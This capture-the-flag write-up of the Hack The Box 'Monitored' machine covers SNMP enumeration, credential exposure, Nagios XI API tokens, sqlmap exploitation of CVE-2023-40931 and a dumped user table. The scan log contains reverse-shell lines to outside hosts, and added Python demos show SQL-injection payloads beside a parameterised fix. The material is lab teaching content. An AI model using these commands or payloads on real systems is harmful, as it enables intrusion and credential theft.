Key points: SNMP enumeration on UDP 161; Nagios XI CVEs (SQL injection and authenticated RCE); root via a sudo-permitted service script that launches a user-writable binary.
Scan
┌──(kali㉿kali)-[~/Desktop/htb/Monitored]
└─$ sudo nmap -sC -sV -sU -T4 -Pn 10.10.11.248
[sudo] password for kali:
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-20 09:06 EST
Warning: 10.10.11.248 giving up on port because retransmission cap hit (6).
Stats: 0:14:09 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan
UDP Scan Timing: About 81.30% done; ETC: 09:23 (0:03:15 remaining)
Stats: 0:32:11 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.91% done; ETC: 09:38 (0:00:01 remaining)
Stats: 0:32:16 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.91% done; ETC: 09:38 (0:00:01 remaining)
Nmap scan report for nagios.monitored.htb (10.10.11.248)
Host is up (0.39s latency).
Not shown: 992 closed udp ports (port-unreach)
PORT STATE SERVICE VERSION
68/udp open|filtered dhcpc
123/udp open ntp NTP v4 (unsynchronized)
| ntp-info:
|_
161/udp open snmp SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-interfaces:
| lo
| IP address: 127.0.0.1 Netmask: 255.0.0.0
| Type: softwareLoopback Speed: 10 Mbps
| Traffic stats: 522.86 Kb sent, 522.86 Kb received
| VMware VMXNET3 Ethernet Controller
| IP address: 10.10.11.248 Netmask: 255.255.254.0
| MAC address: 00:50:56:b9:64:03 (VMware)
| Type: ethernetCsmacd Speed: 4 Gbps
|_ Traffic stats: 76.39 Mb sent, 51.24 Mb received
| snmp-netstat:
| TCP 0.0.0.0:22 0.0.0.0:0
| TCP 0.0.0.0:389 0.0.0.0:0
| TCP 10.10.11.248:46074 10.10.16.48:7777
| TCP 10.10.11.248:49754 10.10.14.146:4444
| TCP 127.0.0.1:25 0.0.0.0:0
| TCP 127.0.0.1:3306 0.0.0.0:0
| TCP 127.0.0.1:5432 0.0.0.0:0
| TCP 127.0.0.1:7878 0.0.0.0:0
| TCP 127.0.0.1:41018 127.0.1.1:80
| TCP 127.0.0.1:41028 127.0.1.1:80
| UDP 0.0.0.0:68 *:*
| UDP 0.0.0.0:123 *:*
| UDP 0.0.0.0:161 *:*
| UDP 0.0.0.0:162 *:*
| UDP 10.10.11.248:123 *:*
|_ UDP 127.0.0.1:123 *:*
| snmp-processes:
| 1:
| Name: systemd
| Path: /sbin/init
| 2:
| Name: kthreadd
| 3:
| Name: rcu_gp
| 4:
| Name: rcu_par_gp
| 5:
| Name: kworker/0:0-events
| 6:
| Name: kworker/0:0H-events_highpri
| 8:
| Name: mm_percpu_wq
| 9:
| Name: rcu_tasks_rude_
| 10:
| Name: rcu_tasks_trace
| 11:
| Name: ksoftirqd/0
| 12:
| Name: rcu_sched
| 13:
| Name: migration/0
| 15:
| Name: cpuhp/0
| 16:
| Name: cpuhp/1
| 17:
| Name: migration/1
| 18:
| Name: ksoftirqd/1
| 20:
| Name: kworker/1:0H-events_highpri
| 23:
| Name: kdevtmpfs
| 24:
| Name: netns
| 25:
| Name: kauditd
| 26:
| Name: khungtaskd
| 27:
| Name: oom_reaper
| 28:
| Name: writeback
| 29:
| Name: kcompactd0
| 30:
| Name: ksmd
| 31:
| Name: khugepaged
| 49:
| Name: kintegrityd
| 50:
| Name: kblockd
| 51:
| Name: blkcg_punt_bio
| 52:
| Name: edac-poller
| 53:
| Name: devfreq_wq
| 54:
| Name: kworker/0:1H-kblockd
| 56:
| Name: kswapd0
| 57:
| Name: kthrotld
| 58:
| Name: irq/24-pciehp
| 59:
| Name: irq/25-pciehp
| 60:
| Name: irq/26-pciehp
| 61:
| Name: irq/27-pciehp
| 62:
| Name: irq/28-pciehp
| 63:
| Name: irq/29-pciehp
| 64:
| Name: irq/30-pciehp
| 65:
| Name: irq/31-pciehp
| 66:
| Name: irq/32-pciehp
| 67:
| Name: irq/33-pciehp
| 68:
| Name: irq/34-pciehp
| 69:
| Name: irq/35-pciehp
| 70:
| Name: irq/36-pciehp
| 71:
| Name: irq/37-pciehp
| 72:
| Name: irq/38-pciehp
| 73:
| Name: irq/39-pciehp
| 74:
| Name: irq/40-pciehp
| 75:
| Name: irq/41-pciehp
| 76:
| Name: irq/42-pciehp
| 77:
| Name: irq/43-pciehp
| 78:
| Name: irq/44-pciehp
| 79:
| Name: irq/45-pciehp
| 80:
| Name: irq/46-pciehp
| 81:
| Name: irq/47-pciehp
| 82:
| Name: irq/48-pciehp
| 83:
| Name: irq/49-pciehp
| 84:
| Name: irq/50-pciehp
| 85:
| Name: irq/51-pciehp
| 86:
| Name: irq/52-pciehp
| 87:
| Name: irq/53-pciehp
| 88:
| Name: irq/54-pciehp
| 89:
| Name: irq/55-pciehp
| 90:
| Name: acpi_thermal_pm
| 91:
| Name: ipv6_addrconf
| 101:
| Name: kstrp
| 104:
| Name: zswap-shrink
| 105:
| Name: kworker/u5:0
| 127:
| Name: kworker/1:1H-kblockd
| 153:
| Name: mpt_poll_0
| 155:
| Name: mpt/0
| 156:
| Name: ata_sff
| 157:
| Name: scsi_eh_0
| 158:
| Name: scsi_tmf_0
| 159:
| Name: scsi_eh_1
| 160:
| Name: scsi_eh_2
| 161:
| Name: scsi_tmf_1
| 163:
| Name: scsi_tmf_2
| 164:
| Name: scsi_eh_3
| 165:
| Name: scsi_tmf_3
| 166:
| Name: scsi_eh_4
| 167:
| Name: scsi_tmf_4
| 168:
| Name: scsi_eh_5
| 169:
| Name: scsi_tmf_5
| 170:
| Name: scsi_eh_6
| 171:
| Name: scsi_tmf_6
| 172:
| Name: scsi_eh_7
| 173:
| Name: scsi_tmf_7
| 174:
| Name: scsi_eh_8
| 175:
| Name: scsi_tmf_8
| 176:
| Name: scsi_eh_9
| 177:
| Name: scsi_tmf_9
| 178:
| Name: scsi_eh_10
| 179:
| Name: scsi_tmf_10
| 180:
| Name: scsi_eh_11
| 181:
| Name: scsi_tmf_11
| 182:
| Name: scsi_eh_12
| 183:
| Name: scsi_tmf_12
| 184:
| Name: scsi_eh_13
| 185:
| Name: scsi_tmf_13
| 186:
| Name: scsi_eh_14
| 187:
| Name: scsi_tmf_14
| 188:
| Name: scsi_eh_15
| 189:
| Name: scsi_tmf_15
| 190:
| Name: scsi_eh_16
| 191:
| Name: scsi_tmf_16
| 192:
| Name: scsi_eh_17
| 193:
| Name: scsi_tmf_17
| 194:
| Name: scsi_eh_18
| 195:
| Name: scsi_tmf_18
| 196:
| Name: scsi_eh_19
| 197:
| Name: scsi_tmf_19
| 198:
| Name: scsi_eh_20
| 199:
| Name: scsi_tmf_20
| 200:
| Name: scsi_eh_21
| 201:
| Name: scsi_tmf_21
| 202:
| Name: scsi_eh_22
| 203:
| Name: scsi_tmf_22
| 204:
| Name: scsi_eh_23
| 205:
| Name: scsi_tmf_23
| 206:
| Name: scsi_eh_24
| 207:
| Name: scsi_tmf_24
| 208:
| Name: scsi_eh_25
| 209:
| Name: scsi_tmf_25
| 210:
| Name: scsi_eh_26
| 211:
| Name: scsi_tmf_26
| 212:
| Name: scsi_eh_27
| 213:
| Name: scsi_tmf_27
| 214:
| Name: scsi_eh_28
| 215:
| Name: scsi_tmf_28
| 216:
| Name: scsi_eh_29
| 217:
| Name: scsi_tmf_29
| 218:
| Name: scsi_eh_30
| 219:
| Name: scsi_tmf_30
| 220:
| Name: scsi_eh_31
| 221:
| Name: scsi_tmf_31
| 249:
| Name: kworker/u4:30-ext4-rsv-conversion
| 250:
| Name: kworker/u4:31-ext4-rsv-conversion
| 252:
| Name: scsi_eh_32
| 253:
| Name: scsi_tmf_32
| 284:
| Name: jbd2/sda1-8
| 285:
| Name: ext4-rsv-conver
| 323:
| Name: systemd-journal
| Path: /lib/systemd/systemd-journald
| 346:
| Name: systemd-udevd
| Path: /lib/systemd/systemd-udevd
| 391:
| Name: irq/16-vmwgfx
| 393:
| Name: ttm_swap
| 394:
| Name: cryptd
| 395:
| Name: card0-crtc0
| 398:
| Name: card0-crtc1
| 399:
| Name: card0-crtc2
| 401:
| Name: card0-crtc3
| 403:
| Name: card0-crtc4
| 405:
| Name: card0-crtc5
| 407:
| Name: card0-crtc6
| 409:
| Name: card0-crtc7
| 422:
| Name: VGAuthService
| Path: /usr/bin/VGAuthService
| 424:
| Name: vmtoolsd
| Path: /usr/bin/vmtoolsd
| 446:
| Name: auditd
| Path: /sbin/auditd
| 458:
| Name: laurel
| Path: /usr/local/sbin/laurel
| Params: --config /etc/laurel/config.toml
| 463:
| Name: kworker/1:3-events
| 517:
| Name: audit_prune_tre
| 543:
| Name: hwmon1
| 551:
| Name: cron
| Path: /usr/sbin/cron
| Params: -f
| 552:
| Name: dbus-daemon
| Path: /usr/bin/dbus-daemon
| Params: --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
| 554:
| Name: rsyslogd
| Path: /usr/sbin/rsyslogd
| Params: -n -iNONE
| 556:
| Name: systemd-logind
| Path: /lib/systemd/systemd-logind
| 558:
| Name: wpa_supplicant
| Path: /sbin/wpa_supplicant
| Params: -u -s -O /run/wpa_supplicant
| 561:
| Name: cron
| Path: /usr/sbin/CRON
| Params: -f
| 591:
| Name: sh
| Path: /bin/sh
| Params: -c sleep 30; sudo -u svc /bin/bash -c /opt/scripts/check_host.sh svc XjH7VCehowpR1xZB
| 646:
| Name: dhclient
| Path: /sbin/dhclient
| Params: -4 -v -i -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases -I -df /var/lib/dhcp/dhclient6.eth0.leases eth0
| 716:
| Name: avahi-autoipd
| Path: avahi-autoipd: [eth0] sleeping
| 717:
| Name: avahi-autoipd
| Path: avahi-autoipd: [eth0] callout dispatcher
| 768:
| Name: snmptrapd
| Path: /usr/sbin/snmptrapd
| Params: -LOw -f -p /run/snmptrapd.pid
| 788:
| Name: snmpd
| Path: /usr/sbin/snmpd
| Params: -LOw -u Debian-snmp -g Debian-snmp -I -smux mteTrigger mteTriggerConf -f -p /run/snmpd.pid
| 791:
| Name: ntpd
| Path: /usr/sbin/ntpd
| Params: -p /var/run/ntpd.pid -g -u 108:116
| 800:
| Name: agetty
| Path: /sbin/agetty
| Params: -o -p -- u --noclear tty1 linux
| 806:
| Name: sshd
| Path: sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
| 852:
| Name: shellinaboxd
| Path: /usr/bin/shellinaboxd
| Params: -q --background=/var/run/shellinaboxd.pid -c /var/lib/shellinabox -p 7878 -u shellinabox -g shellinabox --user-css Black on Whit
| 855:
| Name: shellinaboxd
| Path: /usr/bin/shellinaboxd
| Params: -q --background=/var/run/shellinaboxd.pid -c /var/lib/shellinabox -p 7878 -u shellinabox -g shellinabox --user-css Black on Whit
| 856:
| Name: slapd
| Path: /usr/sbin/slapd
| Params: -h ldap:/// ldapi:/// -g openldap -u openldap -F /etc/ldap/slapd.d
| 866:
| Name: apache2
| Path: /usr/sbin/apache2
| Params: -k start
| 878:
| Name: postgres
| Path: /usr/lib/postgresql/13/bin/postgres
| Params: -D /var/lib/postgresql/13/main -c config_file=/etc/postgresql/13/main/postgresql.conf
| 901:
| Name: postgres
| Path: postgres: 13/main: checkpointer
| 902:
| Name: postgres
| Path: postgres: 13/main: background writer
| 903:
| Name: postgres
| Path: postgres: 13/main: walwriter
| 904:
| Name: postgres
| Path: postgres: 13/main: autovacuum launcher
| 905:
| Name: postgres
| Path: postgres: 13/main: stats collector
| 906:
| Name: postgres
| Path: postgres: 13/main: logical replication launcher
| 939:
| Name: mariadbd
| Path: /usr/sbin/mariadbd
| 993:
| Name: snmptt
| Path: /usr/bin/perl
| Params: /usr/sbin/snmptt --daemon
| 995:
| Name: snmptt
| Path: /usr/bin/perl
| Params: /usr/sbin/snmptt --daemon
| 1033:
| Name: xinetd
| Path: /usr/sbin/xinetd
| Params: -pidfile /run/xinetd.pid -stayalive -inetd_compat -inetd_ipv6
| 1552:
| Name: sudo
| Path: sudo
| Params: -u svc /bin/bash -c /opt/scripts/check_host.sh svc XjH7VCehowpR1xZB
| 1553:
| Name: bash
| Path: /bin/bash
| Params: -c /opt/scripts/check_host.sh svc XjH7VCehowpR1xZB
| 1596:
| Name: exim4
| Path: /usr/sbin/exim4
| Params: -bd -q30m
| 3687:
| Name: cron
| Path: /usr/sbin/CRON
| Params: -f
| 3688:
| Name: sh
| Path: /bin/sh
| Params: -c /usr/bin/php -q /usr/local/nagiosxi/cron/cmdsubsys.php >> /usr/local/nagiosxi/var/cmdsubsys.log 2>&1
| 3689:
| Name: php
| Path: /usr/bin/php
| Params: -q /usr/local/nagiosxi/cron/cmdsubsys.php
| 3694:
| Name: sh
| Path: sh
| Params: -c bash -c 'bash -i >& /dev/tcp/10.10.14.146/4444 0>&1'
| 3695:
| Name: bash
| Path: bash
| Params: -c bash -i >& /dev/tcp/10.10.14.146/4444 0>&1
| 3696:
| Name: bash
| Path: bash
| Params: -i
| 3718:
| Name: python3
| Path: python3
| Params: -c import pty; pty.spawn("/bin/bash")
| 3719:
| Name: bash
| Path: /bin/bash
| 4135:
| 4578:
| Name: kworker/0:1-cgroup_destroy
| 4767:
| Name: kworker/u4:0-flush-8:0
| 4982:
| Name: cron
| Path: /usr/sbin/CRON
| Params: -f
| 4983:
| Name: sh
| Path: /bin/sh
| Params: -c /usr/bin/php -q /usr/local/nagiosxi/cron/cmdsubsys.php >> /usr/local/nagiosxi/var/cmdsubsys.log 2>&1
| 4984:
| Name: php
| Path: /usr/bin/php
| Params: -q /usr/local/nagiosxi/cron/cmdsubsys.php
| 5094:
| Name: sh
| Path: sh
| Params: -c bash -c 'bash -i >&/dev/tcp/10.10.16.48/7777 0>&1'
| 5095:
| Name: bash
| Path: bash
| Params: -c bash -i >&/dev/tcp/10.10.16.48/7777 0>&1
| 5096:
| Name: bash
| Path: bash
| Params: -i
| 5232:
| Name: kworker/1:0-events
| 5312:
| Name: kworker/0:2-events
| 5316:
| 5341:
| 5346:
| 5349:
| 5352:
| 5363:
| Name: apache2
| Path: /usr/sbin/apache2
| 5364:
| 5371:
| Name: apache2
| Path: /usr/sbin/apache2
| 5373:
| 5379:
| 5380:
| 5381:
| 5383:
| 5384:
| 5385:
| 5387:
| 5396:
| 5397:
| Name: cron
| 5398:
| Name: sh
| 5399:
| Name: php
| 5400:
| 5401:
| 5404:
| Name: sh
| 5405:
| Name: bash
| 5406:
| Name: bash
| 5408:
| 5411:
| 5412:
| 5413:
| Name: apache2
| Path: /usr/sbin/apache2
| Params: -k start
|_ 5414:
| snmp-sysdescr: Linux monitored 5.10.0-27-amd64 #1 SMP Debian 5.10.205-2 (2023-12-31) x86_64
|_ System uptime: 31m38.33s (189833 timeticks)
| snmp-win32-software:
| (omitted)
| snmp-info:
| enterprise: net-snmp
| engineIDFormat: unknown
| engineIDData: 6f3fa7421af94c6500000000
| snmpEngineBoots: 35
|_ snmpEngineTime: 31m38s
162/udp open snmp net-snmp; net-snmp SNMPv3 server
| snmp-info:
| enterprise: net-snmp
| engineIDFormat: unknown
| engineIDData: 5a44ab2146ff4c6500000000
| snmpEngineBoots: 26
|_ snmpEngineTime: 31m38s
402/udp open|filtered genie
17673/udp open|filtered unknown
18373/udp open|filtered unknown
29243/udp open|filtered unknown
Service Info: Host: monitored
Host script results:
|_clock-skew: 4s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2945.50 seconds
Enum
The SNMP netstat lists 389/tcp (slapd), so start with an anonymous ldapsearch. (The netstat and process list also show other players' reverse shells to 10.10.14.146 and 10.10.16.48; this was a shared instance.)
┌──(kali㉿kali)-[~/Desktop/htb/Monitored]
└─$ ldapsearch -x -H ldap://monitored.htb -b "DC=monitored,DC=htb"
# extended LDIF
#
# LDAPv3
# base <DC=monitored,DC=htb> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#
# monitored.htb
dn: dc=monitored,dc=htb
objectClass: top
objectClass: dcObject
objectClass: organization
o: monitored.htb
dc: monitored
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
That only returns the base object for monitored.htb, nothing useful. Back to UDP 161: nmap's snmp-* scripts already dumped a lot with the public community string, and snmpwalk pulls the same tables in full (reference: HackTricks):
https://book.hacktricks.xyz/network-services-pentesting/pentesting-snmp
snmpwalk -v2c -c public monitored.htb
The hrSWRunTable part of the walk (the same data as snmp-processes above, PIDs 591/1552/1553) shows a cron job running sudo -u svc /bin/bash -c /opt/scripts/check_host.sh svc XjH7VCehowpR1xZB. The password is passed on the command line, so anyone who can query SNMP with the public community string can read it:
svc XjH7VCehowpR1xZB
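Spotting one secret in a full snmpwalk by eye is tedious. The Python below is an added example (mine, not from the original writeup or from any tool it uses): it parses hrSWRunTable output, joins the name/path/parameters rows by PID and flags arguments that look like credentials. The sample walk output is constructed for the demo; the cron and sudo entries mirror the scan above, while the mysql and sync.sh entries and their passwords are invented.

```python
import re

# Constructed sample of `snmpwalk -v2c -c public <host> hrSWRunTable` output. Lines appear in
# both the MIB-resolved form and the numeric form net-snmp prints when MIBs are not installed.
# PIDs 551 and 1552 mirror the scan above; the mysql and sync.sh entries are invented.
SAMPLE_WALK = """\
HOST-RESOURCES-MIB::hrSWRunName.551 = STRING: "cron"
HOST-RESOURCES-MIB::hrSWRunPath.551 = STRING: "/usr/sbin/cron"
HOST-RESOURCES-MIB::hrSWRunParameters.551 = STRING: "-f"
HOST-RESOURCES-MIB::hrSWRunName.1552 = STRING: "sudo"
HOST-RESOURCES-MIB::hrSWRunPath.1552 = STRING: "sudo"
HOST-RESOURCES-MIB::hrSWRunParameters.1552 = STRING: "-u svc /bin/bash -c /opt/scripts/check_host.sh svc XjH7VCehowpR1xZB"
iso.3.6.1.2.1.25.4.2.1.2.939 = STRING: "mariadbd"
iso.3.6.1.2.1.25.4.2.1.4.939 = STRING: "/usr/sbin/mariadbd"
iso.3.6.1.2.1.25.4.2.1.5.939 = ""
iso.3.6.1.2.1.25.4.2.1.2.2001 = STRING: "mysql"
iso.3.6.1.2.1.25.4.2.1.4.2001 = STRING: "/usr/bin/mysql"
iso.3.6.1.2.1.25.4.2.1.5.2001 = STRING: "-u nagiosxi -pS3cretDbPass -h localhost nagiosxi"
iso.3.6.1.2.1.25.4.2.1.2.3001 = STRING: "sync.sh"
iso.3.6.1.2.1.25.4.2.1.4.3001 = STRING: "/bin/bash"
iso.3.6.1.2.1.25.4.2.1.5.3001 = STRING: "/opt/sync.sh --password=Winter2024!"
"""

# hrSWRunEntry (HOST-RESOURCES-MIB, 1.3.6.1.2.1.25.4.2.1): column .2 name, .4 path, .5 parameters.
OID_COLUMNS = {
    "1.3.6.1.2.1.25.4.2.1.2": "name",
    "1.3.6.1.2.1.25.4.2.1.4": "path",
    "1.3.6.1.2.1.25.4.2.1.5": "params",
}
NAME_COLUMNS = {"hrSWRunName": "name", "hrSWRunPath": "path", "hrSWRunParameters": "params"}
LINE_RE = re.compile(r'^(?P<oid>\S+)\.(?P<pid>\d+) = (?:STRING: )?(?P<val>.*)$')
FLAG_RE = re.compile(r"(?i)^(?:--?)?(?:pass(?:word|wd)?|pwd|secret|token|api[_-]?key)=(?P<val>.+)$")


def parse_hr_sw_run(text):
    """Group the walk into {pid: {"name", "path", "params"}}, accepting either OID notation."""
    procs = {}
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        oid = m.group("oid")
        if "::" in oid:
            col = NAME_COLUMNS.get(oid.split("::", 1)[1])
        else:
            col = OID_COLUMNS.get(oid.replace("iso.", "1.", 1).lstrip("."))
        if col is None:
            continue
        val = m.group("val").strip()
        if len(val) >= 2 and val[0] == val[-1] == '"':
            val = val[1:-1]
        procs.setdefault(int(m.group("pid")), {"name": "", "path": "", "params": ""})[col] = val
    return procs


def looks_like_secret(tok):
    """Positional argument that is long, alphanumeric and mixes cases and digits (like the svc token)."""
    if tok.startswith(("/", "-")) or len(tok) < 12 or not tok.isalnum():
        return False
    return (any(c.islower() for c in tok) and any(c.isupper() for c in tok)
            and any(c.isdigit() for c in tok))


def find_credentials(procs):
    """Return (pid, reason, value) for every argument that looks like a credential."""
    hits = []
    for pid, p in sorted(procs.items()):
        for tok in p["params"].split():
            flag = FLAG_RE.match(tok)
            # mysql/mariadb clients accept the password glued to -p; it then sits in the process table.
            if p["name"].startswith(("mysql", "mariadb")) and tok.startswith("-p") and len(tok) > 2:
                hits.append((pid, "mysql -p<password> on command line", tok[2:]))
            elif flag:
                hits.append((pid, "password-style flag", flag.group("val")))
            elif looks_like_secret(tok):
                hits.append((pid, "high-entropy positional argument", tok))
    return hits


if __name__ == "__main__":
    for pid, reason, value in find_credentials(parse_hr_sw_run(SAMPLE_WALK)):
        print(f"pid {pid}: {reason}: {value}")
```

Walking the whole tree against a slow host takes a while; snmpwalk accepts an object name or OID as its last argument, so `snmpwalk -v2c -c public monitored.htb hrSWRunTable` (or 1.3.6.1.2.1.25.4.2 without MIBs) fetches just the process table, which is what this parser consumes. The heuristics are deliberately loose; the point is to surface candidates for a human to confirm.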
Web
The svc credentials do not work on the web login (the user table dumped later shows why: svc has enabled = 0), so brute-force directories. Besides the admin pages there is an API under /nagiosxi/api. Searching for Nagios XI CVEs leads to these threads:
https://support.nagios.com/forum/viewtopic.php?f=16&t=42923
https://support.nagios.com/forum/viewtopic.php?f=16&t=58783
Use the API authenticate endpoint with the svc credentials to get a token:
┌──(root㉿kali)-[/home/kali/Desktop/htb/Monitored]
└─# curl -k -X POST 'https://nagios.monitored.htb/nagiosxi/api/v1/authenticate' -d 'username=svc&password=XjH7VCehowpR1xZB&valid_min=500'
{"username":"svc","user_id":"2","auth_token":"37d33a2be847fa499528a908aa4d165cdf5f7fde","valid_min":500,"valid_until":"Sat, 20 Jan 2024 17:48:41 -0500"}
Searching turns up CVE-2023-40931: the id parameter of nagiosxi/admin/banner_message-ajaxhelper.php is SQL-injectable, and the endpoint accepts the token from the previous step, so a low-privileged account is enough. Straight to sqlmap:
sqlmap -u "https://nagios.monitored.htb//nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3&token=37d33a2be847fa499528a908aa4d165cdf5f7fde" --level 5 --risk 3 -p id --batch
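To see why a numeric id parameter is exploitable and what the fix looks like, here is an added stand-in in Python/SQLite. It is not Nagios XI's code; the table and column names are invented to resemble the dump further down. The vulnerable function pastes id into the query text, which is the bug class CVE-2023-40931 belongs to; the hardened one enforces the type and binds the value. The payloads are the two kinds sqlmap tries: boolean-based detection and UNION-based extraction.

```python
import sqlite3

# Constructed stand-in schema. These are NOT Nagios XI's real tables or code; the names only echo
# the dump so the demo reads naturally.
SCHEMA = """
CREATE TABLE xi_banner_messages (id INTEGER PRIMARY KEY, message TEXT);
CREATE TABLE xi_users (user_id INTEGER PRIMARY KEY, username TEXT, api_key TEXT);
INSERT INTO xi_banner_messages VALUES (3, 'Scheduled maintenance tonight');
INSERT INTO xi_users VALUES (1, 'nagiosadmin', 'KEY-ADMIN-0001'), (2, 'svc', 'KEY-SVC-0002');
"""


def make_db():
    """In-memory SQLite database loaded with the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def fetch_banner_vulnerable(conn, id_param):
    """Bug class of CVE-2023-40931: the request parameter is pasted into the SQL text,
    so anything after the number becomes SQL."""
    sql = f"SELECT id, message FROM xi_banner_messages WHERE id = {id_param}"
    return conn.execute(sql).fetchall()


def fetch_banner_safe(conn, id_param):
    """Hardened form: enforce the expected type, then bind the value as a parameter."""
    try:
        banner_id = int(id_param)
    except (TypeError, ValueError):
        raise ValueError(f"id must be an integer, got {id_param!r}")
    return conn.execute(
        "SELECT id, message FROM xi_banner_messages WHERE id = ?", (banner_id,)
    ).fetchall()


def rejects(conn, id_param):
    """True if the hardened query refuses the input (shows the payloads no longer work)."""
    try:
        fetch_banner_safe(conn, id_param)
    except ValueError:
        return True
    return False


# Boolean-based probes: same row for a true condition, nothing for a false one.
BOOL_TRUE = "3 AND 1=1"
BOOL_FALSE = "3 AND 1=2"
# UNION-based extraction: the second SELECT's columns ride along in the banner's two columns.
UNION_PAYLOAD = "0 UNION SELECT user_id, api_key FROM xi_users"


def demo():
    """Run every payload against both versions and return the observable results."""
    conn = make_db()
    return {
        "normal": fetch_banner_vulnerable(conn, "3"),
        "bool_true": fetch_banner_vulnerable(conn, BOOL_TRUE),
        "bool_false": fetch_banner_vulnerable(conn, BOOL_FALSE),
        "leaked_keys": sorted(r[1] for r in fetch_banner_vulnerable(conn, UNION_PAYLOAD)),
        "safe_rejects_union": rejects(conn, UNION_PAYLOAD),
        "safe_normal": fetch_banner_safe(conn, "3"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The boolean pair is what lets sqmap's `-p id` detection work even when the page never echoes the query result: a different response for 1=1 versus 1=2 is enough. The UNION payload is the shortcut to the api_key column that the sqlmap dump below reaches the long way.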
Walk the databases, tables and columns the same way, then dump nagiosxi.xi_users; the command below re-authenticates inline so the token in the URL is fresh:
sqlmap -u "https://nagios.monitored.htb//nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3&token=`curl -ksX POST https://nagios.monitored.htb/nagiosxi/api/v1/authenticate -d "username=svc&password=XjH7VCehowpR1xZB&valid_min=500" | awk -F'"' '{print$12}'`" --level 5 --risk 3 -p id --batch -D nagiosxi -T xi_users --dump
Database: nagiosxi
Table: xi_users
[8 entries]
+---------+------------------------+----------------------+------------------------------------------------------------------+---------+--------------------------------------------------------------+-------------+------------+------------+-------------+-------------+--------------+--------------+------------------------------------------------------------------+----------------+----------------+----------------------+
| user_id | email | name | api_key | enabled | password | username | created_by | last_login | api_enabled | last_edited | created_time | last_attempt | backend_ticket | last_edited_by | login_attempts | last_password_change |
+---------+------------------------+----------------------+------------------------------------------------------------------+---------+--------------------------------------------------------------+-------------+------------+------------+-------------+-------------+--------------+--------------+------------------------------------------------------------------+----------------+----------------+----------------------+
| 1 | [email protected] | Nagios Administrator | IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL | 1 | $2a$10$825c1eec29c150b118fe7unSfxq80cf7tHwC0J0BG2qZiNzWRUx2C | nagiosadmin | 0 | 1701931372 | 1 | 1701427555 | 0 | 0 | IoAaeXNLvtDkH5PaGqV2XZ3vMZJLMDR0 | 5 | 0 | 1701427555 |
| 2 | [email protected] | svc | 2huuT2u2QIPqFuJHnkPEEuibGJaJIcHCFDpDb29qSFVlbdO4HJkjfg2VpDNE3PEK | 0 | $2a$10$12edac88347093fcfd392Oun0w66aoRVCrKMPBydaUfgsgAOUHSbK | svc | 1 | 1699724476 | 1 | 1699728200 | 1699634403 | 1705760765 | 6oWBPbarHY4vejimmu3K8tpZBNrdHpDgdUEs5P2PFZYpXSuIdrRMYgk66A0cjNjq | 1 | 7 | 1699697433 |
| 6 | [email protected] | opcode | Ou33MAj0IfCIJg3iHOLY0rnKIgCj49loAL2RljN8neqORlheNJWYK0OiuqqhXO4f | 1 | $2a$10$b43fe283c318f646849d8uAujK14jfDD0xqBFR05Xt2lvX1al5m6u | opcode | 0 | 1705758991 | 0 | 0 | 0 | 0 | peJDmtr59inAnK3BYveojo8tAAVUY7pTNdQ7ghKLMd46eDYbksP2KfKtWi2jmUMg | 0 | 0 | 1705759009 |
| 7 | [email protected] | gage | 5HHXHqKnhAZTv4cmv8nALgZNrm59k8eVeE7M8j4NPH3eAFfVheYps3OTJKeci8GE | 1 | $2a$10$593e290d91b0b351ec413uLOXA7HHETzepbggKDRsCNlhkQ8/Fyu6 | caixukun | 0 | 1705759068 | 0 | 0 | 0 | 1705759323 | mlfjjUVpKgmYOKi2g7UHPf7NRse6cGtFeI4FKbusEAZiaTCDUdiPeWnYJEXJjua8 | 0 | 1 | 1705759127 |
| 8 | [email protected] | xyzxyz | 6lKRku0Nr54gZdLOgKUqGT5Mdb2Aj0pmsSu03AOO0VUqbroBMeqMYLR4kj6Hhoko | 1 | $2a$10$365df3d40687ff5fbc032uHet20Fjzb.vlnMuSgvoU2tFmzCMTUOq | xyzxyz | 0 | 1705759430 | 0 | 0 | 0 | 0 | JbdSTls6XhslQnirqE2KQtAPV9D92QIPuumiqBJhbJhakkWdjg8qH9H53TufqLuM | 0 | 0 | 1705759453 |
| 9 | [email protected] | admin | 4ErhsgfjJQCZJaE8lk0UsNTbcoOnQvAnBQGYfVIqq5jhbGmtqDcDfgC56oVLeFTA | 1 | $2a$10$47b968ae15ea823bd821buBL6rwR20PYKHUEB8/NAdbsAUDT.rVT2 | admin | 0 | 1705760553 | 0 | 0 | 0 | 0 | DHkQ9rfItbfuBAhErGcKkS5ebfuqcE9KsbPHPHdrch3ifOA2QTZbI56UNXv3pSvq | 0 | 0 | 1705760617 |
| 10 | admin111@localhost | Admin111 | ZLA8L2tecJNFm8BCuZhl9DrGoopfnLPkEYXLWFqIBdNFou5h7vcqnOvopDXaMpQt | 1 | $2a$10$e26442a9d958ed79c4dbfeMqqnMpqAqLoYEfuLZ6mHYFN1a7OLeMu | admin111 | 0 | 1705761352 | 0 | 0 | 0 | 0 | EtleX3SAUMa2e2IdKu2glhnXh93JtUvqr8K3UCYehJ3WvBgMhWkOBPOGub98FmdP | 0 | 0 | 1705761394 |
